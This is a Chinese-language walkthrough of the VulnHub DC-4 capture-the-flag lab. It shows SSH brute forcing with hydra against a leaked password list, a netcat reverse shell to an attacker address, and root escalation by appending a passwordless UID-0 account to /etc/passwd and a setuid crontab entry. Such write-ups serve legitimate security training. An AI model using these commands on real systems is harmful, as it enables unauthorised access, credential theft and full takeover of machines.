靶場的搭建
靶場下載地址:https://download.vulnhub.com/dc/DC-4.zip
基本資訊收集
nmap掃描網段
nmap -sS -A 192.168.124.0/24
Nmap scan report for 192.168.124.148
Host is up (0.00022s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
| 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open http nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
MAC Address: 00:0C:29:40:C9:C1 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.22 ms 192.168.124.148
得到基本資訊開放了80,ssh埠,作業系統Debian
先爆破一下ssh吧(無結果)
nmap --script=ssh-brute 192.168.124.148
查看80埠,發現不是cms,是個登錄框,提醒admin登錄

嘗試sql,burpsuite跑一下字典沒結果,那我再跑一下看看有過濾沒(我丟還是啥結果沒有),看來沒有注入呀


讓我百度一下題解,我丟,暴力破解密碼可還行,那是時候祭出我100w的大字典了(heng!)
再見沒爆破出來直接看答案(我一點也不happy),看來字典有的落后了
賬號:admin
密碼:happy
登錄進去
嘗試登錄發現是個命令執行功能,抓包看看,更改一下ls,發現能讀取檔案,那先讀取comment看看是怎么執行的


我丟,直接shell_exec(),那直接反彈shell
nc 192.168.124.139 4444 -e /bin/bash
kali端
netcat -l -p 4444

反彈一下互動shell
python -c 'import pty;pty.spawn("/bin/sh")'

發現密碼
在下面目錄發現old-passwords.bak
/home/jim/backups
說是old密碼,打開
cat old-passwords.bak
000000
12345
iloveyou
1q2w3e4r5t
1234
123456a
qwertyuiop
monkey
123321
dragon
654321
666666
123
myspace1
a123456
121212
1qaz2wsx
123qwe
123abc
tinkle
target123
gwerty
1g2w3e4r
gwerty123
zag12wsx
7777777
qwerty1
1q2w3e4r
987654321
222222
qwe123
qwerty123
zxcvbnm
555555
112233
fuckyou
asdfghjkl
12345a
123123123
1q2w3e
qazwsx
loveme1
juventus
jennifer1
!~!1
bubbles
samuel
fuckoff
lovers
cheese1
0123456
123asd
999999999
madison
elizabeth1
music
buster1
lauren
david1
tigger1
123qweasd
taylor1
carlos
tinkerbell
samantha1
Sojdlg123aljg
joshua1
poop
stella
myspace123
asdasd5
freedom1
whatever1
xxxxxx
00000
valentina
a1b2c3
741852963
austin
monica
qaz123
lovely1
music1
harley1
family1
spongebob1
steven
nirvana
1234abcd
hellokitty
thomas1
cooper
520520
muffin
christian1
love13
fucku2
arsenal1
lucky7
diablo
apples
george1
babyboy1
crystal
1122334455
player1
aa123456
vfhbyf
forever1
Password
winston
chivas1
sexy
hockey1
1a2b3c4d
pussy
playboy1
stalker
cherry
tweety
toyota
creative
gemini
pretty1
maverick
brittany1
nathan1
letmein1
cameron1
secret1
google1
heaven
martina
murphy
spongebob
uQA9Ebw445
fernando
pretty
startfinding
softball
dolphin1
fuckme
test123
qwerty1234
kobe24
alejandro
adrian
september
aaaaaa1
bubba1
isabella
abc123456
password3
jason1
abcdefg123
loveyou1
shannon
100200
manuel
leonardo
molly1
flowers
123456z
007007
password.
321321
miguel
samsung1
sergey
sweet1
abc1234
windows
qwert123
vfrcbv
poohbear
d123456
school1
badboy
951753
123456c
111
steven1
snoopy1
garfield
YAgjecc826
compaq
candy1
sarah1
qwerty123456
123456l
eminem1
141414
789789
maria
steelers
iloveme1
morgan1
winner
boomer
lolita
nastya
alexis1
carmen
angelo
nicholas1
portugal
precious
jackass1
jonathan1
yfnfif
bitch
tiffany
rabbit
rainbow1
angel123
popcorn
barbara
brandy
starwars1
barney
natalia
jibril04
hiphop
tiffany1
shorty
poohbear1
simone
albert
marlboro
hardcore
cowboys
sydney
alex
scorpio
1234512345
q12345
qq123456
onelove
bond007
abcdefg1
eagles
crystal1
azertyuiop
winter
sexy12
angelina
james
svetlana
fatima
123456k
icecream
popcorn1
生成爆破字典,爆破ssh
使用hydra,進行爆破,hydra是著名黑客組織thc的一款開源的暴力密碼破解工具,可以在線破解多種密碼,
破解ssh:
hydra -l 用戶名 -p 密碼字典 -t 執行緒 -vV -e ns ip ssh
hydra -l 用戶名 -p 密碼字典 -t 執行緒 -o save.log -vV ip ssh
破解ftp:
hydra ip ftp -l 用戶名 -P 密碼字典 -t 執行緒(默認16) -vV
hydra ip ftp -l 用戶名 -P 密碼字典 -e ns -vV
爆破ssh
hydra -l jim -P passwd.txt -t 10 ssh://192.168.124.148
爆出ssh登錄密碼
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-10 08:38:19
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 252 login tries (l:1/p:252), ~26 tries per task
[DATA] attacking ssh://192.168.124.148:22/
[STATUS] 110.00 tries/min, 110 tries in 00:01h, 142 to do in 00:02h, 10 active
[STATUS] 80.00 tries/min, 160 tries in 00:02h, 92 to do in 00:02h, 10 active
[22][ssh] host: 192.168.124.148 login: jim password: jibril04
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-11-10 08:41:16
ssh賬號:jim密碼:jibril04

提示有個mail
讀取一下信封
/var/mail/jim
告訴了我們賬號密碼

Password is: ^xHhA&hvim0y
See ya,
Charles
切換一下用戶
su charles
查看能夠root執行的命令
sudo -l

發有能夠以root執行的teehee命令,而teehee的作用是可以向檔案中追加內容
提權
將賬號寫入/etc/passwd中
密碼設定為空
echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
對于admin::0:0:::/bin/bash的解釋
[用戶名]:[密碼]:[UID]:[GID]:[身份描述]:[主目錄]:[登錄shell]
參考文章

也可以不將密碼設定為空
mkpasswd -m SHA-512 12345

然后
sudo teehee -a /etc/passwd 12345:$6$OXVv4N3qtVc0LQeI$CPmgAD9tTpzpCu86IaC9gIx6MYta8/huc3utEd3WwyhUWSbDxKIwi/3XCAHjOqn.rT/lamYZTxbKDoJXkxXaa1:0:0:::/bin/bash
其中-e 類似等于>>
然后切換用戶


cat /root/flag.txt
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Congratulations!!!
Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.
寫入定時檔案/etc/crontab
向/etc/crontab檔案中寫入新的定時任務
時間部分全部填寫為*,意思是每分鐘執行一次,通過寫入將/bin/sh的權限修改為4777,這樣就可以在非root用戶下執行它,并且執行期間擁有root權限,
sudo teehee /etc/crontab
* * * * * root chmod 4777 /bin/sh

參考文章及其說明
安全客
https://www.cnblogs.com/yurang/p/13721862.html
最后歡迎訪問我的個人博客:https://lnng.top/
說明:本文僅限技術研究與討論,嚴禁用于非法用途,否則產生的一切后果自行承擔
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/211010.html
標籤:其他
上一篇:iPhone 12再陷“信號門”:用戶稱每天需多次重啟恢復;螞蟻集團打新資金退款如期到賬;Mutt 2.0 發布|極客頭條
